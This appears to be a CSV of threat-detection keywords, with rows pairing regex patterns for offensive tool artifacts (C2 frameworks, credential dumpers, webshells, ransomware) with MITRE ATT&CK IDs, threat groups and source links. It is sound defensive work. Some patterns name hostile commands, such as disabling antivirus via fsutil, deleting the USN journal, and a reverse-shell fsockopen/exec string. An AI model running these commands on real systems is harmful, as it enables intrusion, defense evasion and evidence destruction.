"*from https://github.com/S3cur3Th1sSh1t/Nim_Dinvoke*",".{0,1000}from\shttps\:\/\/github\.com\/S3cur3Th1sSh1t\/Nim_Dinvoke.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","45316"
"*from https://www.stevencampbell.info/Nim-Convert-Shellcode-to-UUID*",".{0,1000}from\shttps\:\/\/www\.stevencampbell\.info\/Nim\-Convert\-Shellcode\-to\-UUID.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","45317"
"*from impacket.*",".{0,1000}from\simpacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45318"
"*from knowsmore import knowsmore*",".{0,1000}from\sknowsmore\simport\sknowsmore.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","45319"
"*from lib.config import *C2_COMMANDS*",".{0,1000}from\slib\.config\simport\s.{0,1000}C2_COMMANDS.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","45320"
"*from lib.core.specmodule import SpecModule*",".{0,1000}from\slib\.core\.specmodule\simport\sSpecModule.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","45321"
"*from Maitm.Maitm *",".{0,1000}from\sMaitm\.Maitm\s.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","45323"
"*from merlin import *",".{0,1000}from\smerlin\simport\s.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","0","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","45325"
"*From Michael Zhmaylo (MzHmO)*",".{0,1000}From\sMichael\sZhmaylo\s\(MzHmO\).{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","45326"
"*from mythic_container.MythicCommandBase*",".{0,1000}from\smythic_container\.MythicCommandBase.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","45327"
"*from mythic_container.MythicGoRPC*",".{0,1000}from\smythic_container\.MythicGoRPC.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","45328"
"*from networking.dhcp_dns_update_utils*",".{0,1000}from\snetworking\.dhcp_dns_update_utils.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","45329"
"*from o365spray.__main__*",".{0,1000}from\so365spray\.__main__.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","#content","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","45330"
"*from o365spray.core.utils*",".{0,1000}from\so365spray\.core\.utils.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","#content","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","45331"
"*from pwn import *",".{0,1000}from\spwn\simport\s.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","0","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","45332"
"*from pysnaffler.rules.constants import *",".{0,1000}from\spysnaffler\.rules\.constants\simport\s.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","45333"
"*from pysnaffler.rules.rule import SnaffleRule*",".{0,1000}from\spysnaffler\.rules\.rule\simport\sSnaffleRule.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","45334"
"*from pysnaffler.ruleset import SnafflerRuleSet*",".{0,1000}from\spysnaffler\.ruleset\simport\sSnafflerRuleSet.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","45335"
"*from pysnaffler.scanner import SnafflerScanner*",".{0,1000}from\spysnaffler\.scanner\simport\sSnafflerScanner.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","45336"
"*from pysnaffler.snaffler import *",".{0,1000}from\spysnaffler\.snaffler\simport\s.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","45337"
"*from randomizers.vbarandomizer import vbaRandomizer*",".{0,1000}from\srandomizers\.vbarandomizer\simport\svbaRandomizer.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","45338"
"*from rarce import exploit*",".{0,1000}from\srarce\simport\sexploit.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","45339"
"*from ritm.lib import *",".{0,1000}from\sritm\.lib\simport\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","45342"
"*from ritm.logger import *",".{0,1000}from\sritm\.logger\simport\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","45343"
"*from server.changehostnPort import *",".{0,1000}from\sserver\.changehostnPort\simport\s.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","45344"
"*from ShellcodeRDI import *",".{0,1000}from\sShellcodeRDI\simport\s.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#content","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","45345"
"*from shellcodes import *",".{0,1000}from\sshellcodes\simport\s.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","45346"
"*from spoofer_config import SpooferConfig*",".{0,1000}from\sspoofer_config\simport\sSpooferConfig.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","45347"
"*from spraycharles import *",".{0,1000}from\sspraycharles\simport\s.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","45348"
"*from tor2web import*",".{0,1000}from\stor2web\simport.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","45351"
"*from wapitiCore.*",".{0,1000}from\swapitiCore\..{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","45352"
"*from windows_downdate.*",".{0,1000}from\swindows_downdate\..{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","45353"
"*from winpwnage.*",".{0,1000}from\swinpwnage\..{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","45354"
"*FromBase64String(""UmVxdWVzdC5JdGVtWyJ6Il0=""*",".{0,1000}FromBase64String\(\""UmVxdWVzdC5JdGVtWyJ6Il0\=\"".{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#base64 #content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","45355"
"*frpc.exe -c frpc.in*",".{0,1000}frpc\.exe\s\-c\sfrpc\.in.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45360"
"*FruityC2.py*",".{0,1000}FruityC2\.py.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","45366"
"*fscan -h */*",".{0,1000}fscan\s\-h\s.{0,1000}\/.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","45367"
"*fscan.exe -*",".{0,1000}fscan\.exe\s\-.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","45368"
"*fsockopen(*0.0.0.0*4444*exec(*",".{0,1000}fsockopen\(.{0,1000}0\.0\.0\.0.{0,1000}4444.{0,1000}exec\(.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","45369"
"*fsutil devdrv enable /disallowAv*",".{0,1000}fsutil\sdevdrv\senable\s\/disallowAv.{0,1000}","offensive_tool_keyword","fsutil","Disables antivirus filtering on the developer drive","T1112 - T1562.001 - T1222.001 - T1480","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://x.com/0gtweet/status/1720532496847167784","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45370"
"*fsutil.exe usn deletejournal /D C:*",".{0,1000}fsutil\.exe\susn\sdeletejournal\s\/D\sC\:.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","45371"
"*ftp.cc.uoc.gr/mirrors/linux/blackarch/*/os/*",".{0,1000}ftp\.cc\.uoc\.gr\/mirrors\/linux\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","45372"
"*ftp.halifax.rwth-aachen.de/blackarch/*/os/*",".{0,1000}ftp\.halifax\.rwth\-aachen\.de\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","45373"
"*ftp.icm.edu.pl/pub/Linux/dist/blackarch/*/os/*",".{0,1000}ftp\.icm\.edu\.pl\/pub\/Linux\/dist\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","45374"
"*ftp.kddilabs.jp/Linux/packages/blackarch/*/os/*",".{0,1000}ftp\.kddilabs\.jp\/Linux\/packages\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","45375"
"*ftp.linux.org.tr/blackarch/*/os/*",".{0,1000}ftp\.linux\.org\.tr\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","45376"
"*FtpC2.exe*",".{0,1000}FtpC2\.exe.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","45377"
"*FtpC2.Tasks*",".{0,1000}FtpC2\.Tasks.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","45378"
"*ftshell -*",".{0,1000}ftshell\s\-.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","45380"
"*ftshell.v3*",".{0,1000}ftshell\.v3.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","45381"
"*Fuck off, no GSSAPI*",".{0,1000}Fuck\soff,\sno\sGSSAPI.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","0","#content","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","45386"
"*Fuck-Etw-main*",".{0,1000}Fuck\-Etw\-main.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","45387"
"*fucksetuptools*",".{0,1000}fucksetuptools.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","45388"
"*FuckThatPacker.*",".{0,1000}FuckThatPacker\..{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","N/A","10","10","637","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z","45389"
"*fuckyoufuckyoufuckyoufuckyoufuckyou*",".{0,1000}fuckyoufuckyoufuckyoufuckyoufuckyou.{0,1000}","offensive_tool_keyword","VoidCrypt","VoidCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","45390"
